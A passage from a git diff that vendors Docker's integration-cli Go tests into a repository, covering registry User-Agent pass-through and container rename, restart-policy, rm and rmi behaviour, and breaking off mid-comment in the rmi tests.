regexp.MustCompile("^\\(Docker-Client/[0-9A-Za-z+]") + bMatchUpstreamUA := reUpstreamUA.MatchString(upstreamUA) + c.Assert(bMatchUpstreamUA, check.Equals, true, check.Commentf("(Upstream) Docker Client User-Agent malformed")) +} + +func registerUserAgentHandler(reg *testRegistry, result *string) { + reg.registerHandler("/v2/", func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(404) + var ua string + for k, v := range r.Header { + if k == "User-Agent" { + ua = v[0] + } + } + *result = ua + }) +} + +// TestUserAgentPassThrough verifies that when an image is pulled from +// a registry, the registry should see a User-Agent string of the form +// [docker engine UA] UptreamClientSTREAM-CLIENT([client UA]) +func (s *DockerRegistrySuite) TestUserAgentPassThrough(c *check.C) { + var ( + buildUA string + pullUA string + pushUA string + loginUA string + ) + + buildReg, err := newTestRegistry(c) + c.Assert(err, check.IsNil) + registerUserAgentHandler(buildReg, &buildUA) + buildRepoName := fmt.Sprintf("%s/busybox", buildReg.hostport) + + pullReg, err := newTestRegistry(c) + c.Assert(err, check.IsNil) + registerUserAgentHandler(pullReg, &pullUA) + pullRepoName := fmt.Sprintf("%s/busybox", pullReg.hostport) + + pushReg, err := newTestRegistry(c) + c.Assert(err, check.IsNil) + registerUserAgentHandler(pushReg, &pushUA) + pushRepoName := fmt.Sprintf("%s/busybox", pushReg.hostport) + + loginReg, err := newTestRegistry(c) + c.Assert(err, check.IsNil) + registerUserAgentHandler(loginReg, &loginUA) + + err = s.d.Start( + "--insecure-registry", buildReg.hostport, + "--insecure-registry", pullReg.hostport, + "--insecure-registry", pushReg.hostport, + "--insecure-registry", loginReg.hostport, + "--disable-legacy-registry=true") + c.Assert(err, check.IsNil) + + dockerfileName, cleanup1, err := makefile(fmt.Sprintf("FROM %s", buildRepoName)) + c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile")) + defer cleanup1() + s.d.Cmd("build", "--file", dockerfileName, ".") + regexpCheckUA(c, buildUA) + + s.d.Cmd("login", "-u", "richard", "-p", "testtest", "-e", "testuser@testdomain.com", loginReg.hostport) + regexpCheckUA(c, loginUA) + + s.d.Cmd("pull", pullRepoName) + regexpCheckUA(c, pullUA) + + dockerfileName, cleanup2, err := makefile(`FROM scratch + ENV foo bar`) + c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile")) + defer cleanup2() + s.d.Cmd("build", "-t", pushRepoName, "--file", dockerfileName, ".") + + s.d.Cmd("push", pushRepoName) + regexpCheckUA(c, pushUA) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go new file mode 100644 index 0000000000..373d614b5e --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go @@ -0,0 +1,138 @@ +package main + +import ( + "strings" + + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/pkg/stringid" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestRenameStoppedContainer(c *check.C) { + out, _ := dockerCmd(c, "run", "--name", "first_name", "-d", "busybox", "sh") + + cleanedContainerID := strings.TrimSpace(out) + dockerCmd(c, "wait", cleanedContainerID) + + name := inspectField(c, cleanedContainerID, "Name") + newName := "new_name" + stringid.GenerateNonCryptoID() + dockerCmd(c, "rename", "first_name", newName) + + name = inspectField(c, cleanedContainerID, "Name") + c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container %s", name)) + +} + +func (s *DockerSuite) TestRenameRunningContainer(c *check.C) { + out, _ := dockerCmd(c, "run", "--name", "first_name", "-d", "busybox", "sh") + + newName := "new_name" + stringid.GenerateNonCryptoID() + cleanedContainerID := strings.TrimSpace(out) + dockerCmd(c, "rename", "first_name", newName) + + name := inspectField(c, cleanedContainerID, "Name") + c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container %s", name)) +} + +func (s *DockerSuite) TestRenameRunningContainerAndReuse(c *check.C) { + out, _ := runSleepingContainer(c, "--name", "first_name") + c.Assert(waitRun("first_name"), check.IsNil) + + newName := "new_name" + ContainerID := strings.TrimSpace(out) + dockerCmd(c, "rename", "first_name", newName) + + name := inspectField(c, ContainerID, "Name") + c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container")) + + out, _ = runSleepingContainer(c, "--name", "first_name") + c.Assert(waitRun("first_name"), check.IsNil) + newContainerID := strings.TrimSpace(out) + name = inspectField(c, newContainerID, "Name") + c.Assert(name, checker.Equals, "/first_name", check.Commentf("Failed to reuse container name")) +} + +func (s *DockerSuite) TestRenameCheckNames(c *check.C) { + dockerCmd(c, "run", "--name", "first_name", "-d", "busybox", "sh") + + newName := "new_name" + stringid.GenerateNonCryptoID() + dockerCmd(c, "rename", "first_name", newName) + + name := inspectField(c, newName, "Name") + c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container %s", name)) + + result := dockerCmdWithResult("inspect", "-f={{.Name}}", "--type=container", "first_name") + c.Assert(result, icmd.Matches, icmd.Expected{ + ExitCode: 1, + Err: "No such container: first_name", + }) +} + +func (s *DockerSuite) TestRenameInvalidName(c *check.C) { + runSleepingContainer(c, "--name", "myname") + + out, _, err := dockerCmdWithError("rename", "myname", "new:invalid") + c.Assert(err, checker.NotNil, check.Commentf("Renaming container to invalid name should have failed: %s", out)) + c.Assert(out, checker.Contains, "Invalid container name", check.Commentf("%v", err)) + + out, _, err = dockerCmdWithError("rename", "myname") + c.Assert(err, checker.NotNil, check.Commentf("Renaming container to invalid name should have failed: %s", out)) + c.Assert(out, checker.Contains, "requires exactly 2 argument(s).", check.Commentf("%v", err)) + + out, _, err = dockerCmdWithError("rename", "myname", "") + c.Assert(err, checker.NotNil, check.Commentf("Renaming container to invalid name should have failed: %s", out)) + c.Assert(out, checker.Contains, "may be empty", check.Commentf("%v", err)) + + out, _, err = dockerCmdWithError("rename", "", "newname") + c.Assert(err, checker.NotNil, check.Commentf("Renaming container with empty name should have failed: %s", out)) + c.Assert(out, checker.Contains, "may be empty", check.Commentf("%v", err)) + + out, _ = dockerCmd(c, "ps", "-a") + c.Assert(out, checker.Contains, "myname", check.Commentf("Output of docker ps should have included 'myname': %s", out)) +} + +func (s *DockerSuite) TestRenameAnonymousContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + + dockerCmd(c, "network", "create", "network1") + out, _ := dockerCmd(c, "create", "-it", "--net", "network1", "busybox", "top") + + anonymousContainerID := strings.TrimSpace(out) + + dockerCmd(c, "rename", anonymousContainerID, "container1") + dockerCmd(c, "start", "container1") + + count := "-c" + if daemonPlatform == "windows" { + count = "-n" + } + + _, _, err := dockerCmdWithError("run", "--net", "network1", "busybox", "ping", count, "1", "container1") + c.Assert(err, check.IsNil, check.Commentf("Embedded DNS lookup fails after renaming anonymous container: %v", err)) +} + +func (s *DockerSuite) TestRenameContainerWithSameName(c *check.C) { + out, _ := runSleepingContainer(c, "--name", "old") + ContainerID := strings.TrimSpace(out) + + out, _, err := dockerCmdWithError("rename", "old", "old") + c.Assert(err, checker.NotNil, check.Commentf("Renaming a container with the same name should have failed")) + c.Assert(out, checker.Contains, "Renaming a container with the same name", check.Commentf("%v", err)) + + out, _, err = dockerCmdWithError("rename", ContainerID, "old") + c.Assert(err, checker.NotNil, check.Commentf("Renaming a container with the same name should have failed")) + c.Assert(out, checker.Contains, "Renaming a container with the same name", check.Commentf("%v", err)) +} + +// Test case for #23973 +func (s *DockerSuite) TestRenameContainerWithLinkedContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + + db1, _ := dockerCmd(c, "run", "--name", "db1", "-d", "busybox", "top") + dockerCmd(c, "run", "--name", "app1", "-d", "--link", "db1:/mysql", "busybox", "top") + dockerCmd(c, "rename", "app1", "app2") + out, _, err := dockerCmdWithError("inspect", "--format={{ .Id }}", "app2/mysql") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, strings.TrimSpace(db1)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go new file mode 100644 index 0000000000..7d585289eb --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go @@ -0,0 +1,278 @@ +package main + +import ( + "os" + "strconv" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestRestartStoppedContainer(c *check.C) { + dockerCmd(c, "run", "--name=test", "busybox", "echo", "foobar") + cleanedContainerID, err := getIDByName("test") + c.Assert(err, check.IsNil) + + out, _ := dockerCmd(c, "logs", cleanedContainerID) + c.Assert(out, checker.Equals, "foobar\n") + + dockerCmd(c, "restart", cleanedContainerID) + + // Wait until the container has stopped + err = waitInspect(cleanedContainerID, "{{.State.Running}}", "false", 20*time.Second) + c.Assert(err, checker.IsNil) + + out, _ = dockerCmd(c, "logs", cleanedContainerID) + c.Assert(out, checker.Equals, "foobar\nfoobar\n") +} + +func (s *DockerSuite) TestRestartRunningContainer(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", "echo foobar && sleep 30 && echo 'should not print this'") + + cleanedContainerID := strings.TrimSpace(out) + + c.Assert(waitRun(cleanedContainerID), checker.IsNil) + + out, _ = dockerCmd(c, "logs", cleanedContainerID) + c.Assert(out, checker.Equals, "foobar\n") + + dockerCmd(c, "restart", "-t", "1", cleanedContainerID) + + out, _ = dockerCmd(c, "logs", cleanedContainerID) + + c.Assert(waitRun(cleanedContainerID), checker.IsNil) + + c.Assert(out, checker.Equals, "foobar\nfoobar\n") +} + +// Test that restarting a container with a volume does not create a new volume on restart. Regression test for #819. +func (s *DockerSuite) TestRestartWithVolumes(c *check.C) { + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + out, _ := runSleepingContainer(c, "-d", "-v", prefix+slash+"test") + + cleanedContainerID := strings.TrimSpace(out) + out, err := inspectFilter(cleanedContainerID, "len .Mounts") + c.Assert(err, check.IsNil, check.Commentf("failed to inspect %s: %s", cleanedContainerID, out)) + out = strings.Trim(out, " \n\r") + c.Assert(out, checker.Equals, "1") + + source, err := inspectMountSourceField(cleanedContainerID, prefix+slash+"test") + c.Assert(err, checker.IsNil) + + dockerCmd(c, "restart", cleanedContainerID) + + out, err = inspectFilter(cleanedContainerID, "len .Mounts") + c.Assert(err, check.IsNil, check.Commentf("failed to inspect %s: %s", cleanedContainerID, out)) + out = strings.Trim(out, " \n\r") + c.Assert(out, checker.Equals, "1") + + sourceAfterRestart, err := inspectMountSourceField(cleanedContainerID, prefix+slash+"test") + c.Assert(err, checker.IsNil) + c.Assert(source, checker.Equals, sourceAfterRestart) +} + +func (s *DockerSuite) TestRestartPolicyNO(c *check.C) { + out, _ := dockerCmd(c, "create", "--restart=no", "busybox") + + id := strings.TrimSpace(string(out)) + name := inspectField(c, id, "HostConfig.RestartPolicy.Name") + c.Assert(name, checker.Equals, "no") +} + +func (s *DockerSuite) TestRestartPolicyAlways(c *check.C) { + out, _ := dockerCmd(c, "create", "--restart=always", "busybox") + + id := strings.TrimSpace(string(out)) + name := inspectField(c, id, "HostConfig.RestartPolicy.Name") + c.Assert(name, checker.Equals, "always") + + MaximumRetryCount := inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount") + + // MaximumRetryCount=0 if the restart policy is always + c.Assert(MaximumRetryCount, checker.Equals, "0") +} + +func (s *DockerSuite) TestRestartPolicyOnFailure(c *check.C) { + out, _, err := dockerCmdWithError("create", "--restart=on-failure:-1", "busybox") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "maximum retry count cannot be negative") + + out, _ = dockerCmd(c, "create", "--restart=on-failure:1", "busybox") + + id := strings.TrimSpace(string(out)) + name := inspectField(c, id, "HostConfig.RestartPolicy.Name") + maxRetry := inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount") + + c.Assert(name, checker.Equals, "on-failure") + c.Assert(maxRetry, checker.Equals, "1") + + out, _ = dockerCmd(c, "create", "--restart=on-failure:0", "busybox") + + id = strings.TrimSpace(string(out)) + name = inspectField(c, id, "HostConfig.RestartPolicy.Name") + maxRetry = inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount") + + c.Assert(name, checker.Equals, "on-failure") + c.Assert(maxRetry, checker.Equals, "0") + + out, _ = dockerCmd(c, "create", "--restart=on-failure", "busybox") + + id = strings.TrimSpace(string(out)) + name = inspectField(c, id, "HostConfig.RestartPolicy.Name") + maxRetry = inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount") + + c.Assert(name, checker.Equals, "on-failure") + c.Assert(maxRetry, checker.Equals, "0") +} + +// a good container with --restart=on-failure:3 +// MaximumRetryCount!=0; RestartCount=0 +func (s *DockerSuite) TestRestartContainerwithGoodContainer(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "--restart=on-failure:3", "busybox", "true") + + id := strings.TrimSpace(string(out)) + err := waitInspect(id, "{{ .State.Restarting }} {{ .State.Running }}", "false false", 30*time.Second) + c.Assert(err, checker.IsNil) + + count := inspectField(c, id, "RestartCount") + c.Assert(count, checker.Equals, "0") + + MaximumRetryCount := inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount") + c.Assert(MaximumRetryCount, checker.Equals, "3") + +} + +func (s *DockerSuite) TestRestartContainerSuccess(c *check.C) { + testRequires(c, SameHostDaemon) + + out, _ := runSleepingContainer(c, "-d", "--restart=always") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), check.IsNil) + + pidStr := inspectField(c, id, "State.Pid") + + pid, err := strconv.Atoi(pidStr) + c.Assert(err, check.IsNil) + + p, err := os.FindProcess(pid) + c.Assert(err, check.IsNil) + c.Assert(p, check.NotNil) + + err = p.Kill() + c.Assert(err, check.IsNil) + + err = waitInspect(id, "{{.RestartCount}}", "1", 30*time.Second) + c.Assert(err, check.IsNil) + + err = waitInspect(id, "{{.State.Status}}", "running", 30*time.Second) + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestRestartWithPolicyUserDefinedNetwork(c *check.C) { + // TODO Windows. This may be portable following HNS integration post TP5. + testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace, NotArm) + dockerCmd(c, "network", "create", "-d", "bridge", "udNet") + + dockerCmd(c, "run", "-d", "--net=udNet", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + + dockerCmd(c, "run", "-d", "--restart=always", "--net=udNet", "--name=second", + "--link=first:foo", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // ping to first and its alias foo must succeed + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo") + c.Assert(err, check.IsNil) + + // Now kill the second container and let the restart policy kick in + pidStr := inspectField(c, "second", "State.Pid") + + pid, err := strconv.Atoi(pidStr) + c.Assert(err, check.IsNil) + + p, err := os.FindProcess(pid) + c.Assert(err, check.IsNil) + c.Assert(p, check.NotNil) + + err = p.Kill() + c.Assert(err, check.IsNil) + + err = waitInspect("second", "{{.RestartCount}}", "1", 5*time.Second) + c.Assert(err, check.IsNil) + + err = waitInspect("second", "{{.State.Status}}", "running", 5*time.Second) + + // ping to first and its alias foo must still succeed + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo") + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestRestartPolicyAfterRestart(c *check.C) { + testRequires(c, SameHostDaemon) + + out, _ := runSleepingContainer(c, "-d", "--restart=always") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), check.IsNil) + + dockerCmd(c, "restart", id) + + c.Assert(waitRun(id), check.IsNil) + + pidStr := inspectField(c, id, "State.Pid") + + pid, err := strconv.Atoi(pidStr) + c.Assert(err, check.IsNil) + + p, err := os.FindProcess(pid) + c.Assert(err, check.IsNil) + c.Assert(p, check.NotNil) + + err = p.Kill() + c.Assert(err, check.IsNil) + + err = waitInspect(id, "{{.RestartCount}}", "1", 30*time.Second) + c.Assert(err, check.IsNil) + + err = waitInspect(id, "{{.State.Status}}", "running", 30*time.Second) + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestRestartContainerwithRestartPolicy(c *check.C) { + out1, _ := dockerCmd(c, "run", "-d", "--restart=on-failure:3", "busybox", "false") + out2, _ := dockerCmd(c, "run", "-d", "--restart=always", "busybox", "false") + + id1 := strings.TrimSpace(string(out1)) + id2 := strings.TrimSpace(string(out2)) + waitTimeout := 15 * time.Second + if daemonPlatform == "windows" { + waitTimeout = 150 * time.Second + } + err := waitInspect(id1, "{{ .State.Restarting }} {{ .State.Running }}", "false false", waitTimeout) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "restart", id1) + dockerCmd(c, "restart", id2) + + dockerCmd(c, "stop", id1) + dockerCmd(c, "stop", id2) + dockerCmd(c, "start", id1) + dockerCmd(c, "start", id2) +} + +func (s *DockerSuite) TestRestartAutoRemoveContainer(c *check.C) { + out, _ := runSleepingContainer(c, "--rm") + + id := strings.TrimSpace(string(out)) + dockerCmd(c, "restart", id) + err := waitInspect(id, "{{ .State.Restarting }} {{ .State.Running }}", "false true", 15*time.Second) + c.Assert(err, checker.IsNil) + + out, _ = dockerCmd(c, "ps") + c.Assert(out, checker.Contains, id[:12], check.Commentf("container should be restarted instead of removed: %v", out)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go new file mode 100644 index 0000000000..0186c56741 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go @@ -0,0 +1,86 @@ +package main + +import ( + "io/ioutil" + "os" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestRmContainerWithRemovedVolume(c *check.C) { + testRequires(c, SameHostDaemon) + + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + + tempDir, err := ioutil.TempDir("", "test-rm-container-with-removed-volume-") + if err != nil { + c.Fatalf("failed to create temporary directory: %s", tempDir) + } + defer os.RemoveAll(tempDir) + + dockerCmd(c, "run", "--name", "losemyvolumes", "-v", tempDir+":"+prefix+slash+"test", "busybox", "true") + + err = os.RemoveAll(tempDir) + c.Assert(err, check.IsNil) + + dockerCmd(c, "rm", "-v", "losemyvolumes") +} + +func (s *DockerSuite) TestRmContainerWithVolume(c *check.C) { + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + + dockerCmd(c, "run", "--name", "foo", "-v", prefix+slash+"srv", "busybox", "true") + + dockerCmd(c, "rm", "-v", "foo") +} + +func (s *DockerSuite) TestRmContainerRunning(c *check.C) { + createRunningContainer(c, "foo") + + _, _, err := dockerCmdWithError("rm", "foo") + c.Assert(err, checker.NotNil, check.Commentf("Expected error, can't rm a running container")) +} + +func (s *DockerSuite) TestRmContainerForceRemoveRunning(c *check.C) { + createRunningContainer(c, "foo") + + // Stop then remove with -s + dockerCmd(c, "rm", "-f", "foo") +} + +func (s *DockerSuite) TestRmContainerOrphaning(c *check.C) { + dockerfile1 := `FROM busybox:latest + ENTRYPOINT ["true"]` + img := "test-container-orphaning" + dockerfile2 := `FROM busybox:latest + ENTRYPOINT ["true"] + MAINTAINER Integration Tests` + + // build first dockerfile + img1, err := buildImage(img, dockerfile1, true) + c.Assert(err, check.IsNil, check.Commentf("Could not build image %s", img)) + // run container on first image + dockerCmd(c, "run", img) + // rebuild dockerfile with a small addition at the end + _, err = buildImage(img, dockerfile2, true) + c.Assert(err, check.IsNil, check.Commentf("Could not rebuild image %s", img)) + // try to remove the image, should not error out. + out, _, err := dockerCmdWithError("rmi", img) + c.Assert(err, check.IsNil, check.Commentf("Expected to removing the image, but failed: %s", out)) + + // check if we deleted the first image + out, _ = dockerCmd(c, "images", "-q", "--no-trunc") + c.Assert(out, checker.Contains, img1, check.Commentf("Orphaned container (could not find %q in docker images): %s", img1, out)) + +} + +func (s *DockerSuite) TestRmInvalidContainer(c *check.C) { + out, _, err := dockerCmdWithError("rm", "unknown") + c.Assert(err, checker.NotNil, check.Commentf("Expected error on rm unknown container, got none")) + c.Assert(out, checker.Contains, "No such container") +} + +func createRunningContainer(c *check.C, name string) { + runSleepingContainer(c, "-dt", "--name", name) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go new file mode 100644 index 0000000000..cb16d9d88c --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go @@ -0,0 +1,352 @@ +package main + +import ( + "fmt" + "os/exec" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/stringid" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestRmiWithContainerFails(c *check.C) { + errSubstr := "is using it" + + // create a container + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + + cleanedContainerID := strings.TrimSpace(out) + + // try to delete the image + out, _, err := dockerCmdWithError("rmi", "busybox") + // Container is using image, should not be able to rmi + c.Assert(err, checker.NotNil) + // Container is using image, error message should contain errSubstr + c.Assert(out, checker.Contains, errSubstr, check.Commentf("Container: %q", cleanedContainerID)) + + // make sure it didn't delete the busybox name + images, _ := dockerCmd(c, "images") + // The name 'busybox' should not have been removed from images + c.Assert(images, checker.Contains, "busybox") +} + +func (s *DockerSuite) TestRmiTag(c *check.C) { + imagesBefore, _ := dockerCmd(c, "images", "-a") + dockerCmd(c, "tag", "busybox", "utest:tag1") + dockerCmd(c, "tag", "busybox", "utest/docker:tag2") + dockerCmd(c, "tag", "busybox", "utest:5000/docker:tag3") + { + imagesAfter, _ := dockerCmd(c, "images", "-a") + c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n")+3, check.Commentf("before: %q\n\nafter: %q\n", imagesBefore, imagesAfter)) + } + dockerCmd(c, "rmi", "utest/docker:tag2") + { + imagesAfter, _ := dockerCmd(c, "images", "-a") + c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n")+2, check.Commentf("before: %q\n\nafter: %q\n", imagesBefore, imagesAfter)) + } + dockerCmd(c, "rmi", "utest:5000/docker:tag3") + { + imagesAfter, _ := dockerCmd(c, "images", "-a") + c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n")+1, check.Commentf("before: %q\n\nafter: %q\n", imagesBefore, imagesAfter)) + + } + dockerCmd(c, "rmi", "utest:tag1") + { + imagesAfter, _ := dockerCmd(c, "images", "-a") + c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n"), check.Commentf("before: %q\n\nafter: %q\n", imagesBefore, imagesAfter)) + + } +} + +func (s *DockerSuite) TestRmiImgIDMultipleTag(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir '/busybox-one'") + + containerID := strings.TrimSpace(out) + + // Wait for it to exit as cannot commit a running container on Windows, and + // it will take a few seconds to exit + if daemonPlatform == "windows" { + err := waitExited(containerID, 60*time.Second) + c.Assert(err, check.IsNil) + } + + dockerCmd(c, "commit", containerID, "busybox-one") + + imagesBefore, _ := dockerCmd(c, "images", "-a") + dockerCmd(c, "tag", "busybox-one", "busybox-one:tag1") + dockerCmd(c, "tag", "busybox-one", "busybox-one:tag2") + + imagesAfter, _ := dockerCmd(c, "images", "-a") + // tag busybox to create 2 more images with same imageID + c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n")+2, check.Commentf("docker images shows: %q\n", imagesAfter)) + + imgID := inspectField(c, "busybox-one:tag1", "Id") + + // run a container with the image + out, _ = runSleepingContainerInImage(c, "busybox-one") + + containerID = strings.TrimSpace(out) + + // first checkout without force it fails + out, _, err := dockerCmdWithError("rmi", imgID) + expected := fmt.Sprintf("conflict: unable to delete %s (cannot be forced) - image is being used by running container %s", stringid.TruncateID(imgID), stringid.TruncateID(containerID)) + // rmi tagged in multiple repos should have failed without force + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, expected) + + dockerCmd(c, "stop", containerID) + dockerCmd(c, "rmi", "-f", imgID) + + imagesAfter, _ = dockerCmd(c, "images", "-a") + // rmi -f failed, image still exists + c.Assert(imagesAfter, checker.Not(checker.Contains), imgID[:12], check.Commentf("ImageID:%q; ImagesAfter: %q", imgID, imagesAfter)) +} + +func (s *DockerSuite) TestRmiImgIDForce(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir '/busybox-test'") + + containerID := strings.TrimSpace(out) + + // Wait for it to exit as cannot commit a running container on Windows, and + // it will take a few seconds to exit + if daemonPlatform == "windows" { + err := waitExited(containerID, 60*time.Second) + c.Assert(err, check.IsNil) + } + + dockerCmd(c, "commit", containerID, "busybox-test") + + imagesBefore, _ := dockerCmd(c, "images", "-a") + dockerCmd(c, "tag", "busybox-test", "utest:tag1") + dockerCmd(c, "tag", "busybox-test", "utest:tag2") + dockerCmd(c, "tag", "busybox-test", "utest/docker:tag3") + dockerCmd(c, "tag", "busybox-test", "utest:5000/docker:tag4") + { + imagesAfter, _ := dockerCmd(c, "images", "-a") + c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n")+4, check.Commentf("before: %q\n\nafter: %q\n", imagesBefore, imagesAfter)) + } + imgID := inspectField(c, "busybox-test", "Id") + + // first checkout without force it fails + out, _, err := dockerCmdWithError("rmi", imgID) + // rmi tagged in multiple repos should have failed without force + c.Assert(err, checker.NotNil) + // rmi tagged in multiple repos should have failed without force + c.Assert(out, checker.Contains, "(must be forced) - image is referenced in multiple repositories", check.Commentf("out: %s; err: %v;", out, err)) + + dockerCmd(c, "rmi", "-f", imgID) + { + imagesAfter, _ := dockerCmd(c, "images", "-a") + // rmi failed, image still exists + c.Assert(imagesAfter, checker.Not(checker.Contains), imgID[:12]) + } +} + +// See https://github.com/docker/docker/issues/14116 +func (s *DockerSuite) TestRmiImageIDForceWithRunningContainersAndMultipleTags(c *check.C) { + dockerfile := "FROM busybox\nRUN echo test 14116\n" + imgID, err := buildImage("test-14116", dockerfile, false) + c.Assert(err, checker.IsNil) + + newTag := "newtag" + dockerCmd(c, "tag", imgID, newTag) + runSleepingContainerInImage(c, imgID) + + out, _, err := dockerCmdWithError("rmi", "-f", imgID) + // rmi -f should not delete image with running containers + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "(cannot be forced) - image is being used by running container") +} + +func (s *DockerSuite) TestRmiTagWithExistingContainers(c *check.C) { + container := "test-delete-tag" + newtag := "busybox:newtag" + bb := "busybox:latest" + dockerCmd(c, "tag", bb, newtag) + + dockerCmd(c, "run", "--name", container, bb, "/bin/true") + + out, _ := dockerCmd(c, "rmi", newtag) + c.Assert(strings.Count(out, "Untagged: "), checker.Equals, 1) +} + +func (s *DockerSuite) TestRmiForceWithExistingContainers(c *check.C) { + image := "busybox-clone" + + cmd := exec.Command(dockerBinary, "build", "--no-cache", "-t", image, "-") + cmd.Stdin = strings.NewReader(`FROM busybox +MAINTAINER foo`) + + out, _, err := runCommandWithOutput(cmd) + c.Assert(err, checker.IsNil, check.Commentf("Could not build %s: %s", image, out)) + + dockerCmd(c, "run", "--name", "test-force-rmi", image, "/bin/true") + + dockerCmd(c, "rmi", "-f", image) +} + +func (s *DockerSuite) TestRmiWithMultipleRepositories(c *check.C) { + newRepo := "127.0.0.1:5000/busybox" + oldRepo := "busybox" + newTag := "busybox:test" + dockerCmd(c, "tag", oldRepo, newRepo) + + dockerCmd(c, "run", "--name", "test", oldRepo, "touch", "/abcd") + + dockerCmd(c, "commit", "test", newTag) + + out, _ := dockerCmd(c, "rmi", newTag) + c.Assert(out, checker.Contains, "Untagged: "+newTag) +} + +func (s *DockerSuite) TestRmiForceWithMultipleRepositories(c *check.C) { + imageName := "rmiimage" + tag1 := imageName + ":tag1" + tag2 := imageName + ":tag2" + + _, err := buildImage(tag1, + `FROM busybox + MAINTAINER "docker"`, + true) + if err != nil { + c.Fatal(err) + } + + dockerCmd(c, "tag", tag1, tag2) + + out, _ := dockerCmd(c, "rmi", "-f", tag2) + c.Assert(out, checker.Contains, "Untagged: "+tag2) + c.Assert(out, checker.Not(checker.Contains), "Untagged: "+tag1) + + // Check built image still exists + images, _ := dockerCmd(c, "images", "-a") + c.Assert(images, checker.Contains, imageName, check.Commentf("Built image missing %q; Images: %q", imageName, images)) +} + +func (s *DockerSuite) TestRmiBlank(c *check.C) { + out, _, err := dockerCmdWithError("rmi", " ") + // Should have failed to delete ' ' image + c.Assert(err, checker.NotNil) + // Wrong error message generated + c.Assert(out, checker.Not(checker.Contains), "no such id", check.Commentf("out: %s", out)) + // Expected error message not generated + c.Assert(out, checker.Contains, "image name cannot be blank", check.Commentf("out: %s", out)) +} + +func (s *DockerSuite) TestRmiContainerImageNotFound(c *check.C) { + // Build 2 images for testing. + imageNames := []string{"test1", "test2"} + imageIds := make([]string, 2) + for i, name := range imageNames { + dockerfile := fmt.Sprintf("FROM busybox\nMAINTAINER %s\nRUN echo %s\n", name, name) + id, err := buildImage(name, dockerfile, false) + c.Assert(err, checker.IsNil) + imageIds[i] = id + } + + // Create a long-running container. + runSleepingContainerInImage(c, imageNames[0]) + + // Create a stopped container, and then force remove its image. + dockerCmd(c, "run", imageNames[1], "true") + dockerCmd(c, "rmi", "-f", imageIds[1]) + + // Try to remove the image of the running container and see if it fails as 